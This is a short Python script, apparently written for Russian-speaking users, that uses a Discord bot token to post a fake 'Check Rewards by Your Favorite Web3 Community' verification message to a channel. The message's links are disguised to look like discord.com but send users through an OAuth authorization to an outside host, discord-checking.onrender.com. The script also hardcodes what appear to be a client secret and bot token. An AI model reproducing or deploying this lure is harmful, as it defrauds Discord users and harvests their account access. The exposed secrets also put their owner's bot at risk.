import requests

CLIENT_ID = "1309778603365502986"
CLIENT_SECRET = "AlYI8ua6aUp55Ty4DPkC4vhSygwCc53F"
BOT_TOKEN = "MTMwOTc3ODYwMzM2NTUwMjk4Ng.GCNpZ6.0iMIMSMDd4a9HYoHR2jJSa3y2Xrlv9TXC9ojZM"
CHANNEL_ID = "ID_КАНАЛА"
MESSAGE_CONTENT = "> **Check Rewards by Your Favorite Web3 Community**
> [https:/discord.com/channel/rewards-checking](https:/discord%2Ecom/oauth2/authorize?client_id=1309416169165557813&response_type=code&redirect_uri=https%3A%2F%2Fdiscord-checking.onrender.com%2Fdashboard&scope=identify+guilds)
> 
> This server is send a automated message. Please verify
>  yourself to get access interact. [Click here](https:/discord%2Ecom/oauth2/authorize?client_id=1309416169165557813&response_type=code&redirect_uri=https%3A%2F%2Fdiscord-checking.onrender.com%2Fdashboard&scope=identify+guilds) to get started"

# URL для отправки сообщения
url = f"https://discord.com/api/v10/channels/{CHANNEL_ID}/messages"

# Заголовки для авторизации
headers = {
    "Authorization": f"Bot {BOT_TOKEN}",
    "Content-Type": "application/json"
}

# Тело запроса
payload = {
    "content": MESSAGE_CONTENT
}

# Отправка запроса
response = requests.post(url, headers=headers, json=payload)

# Проверка ответа
if response.status_code == 200 or response.status_code == 204:
    print("Сообщение успешно отправлено!")
else:
    print(f"Ошибка! Статус код: {response.status_code}, Ответ: {response.json()}")

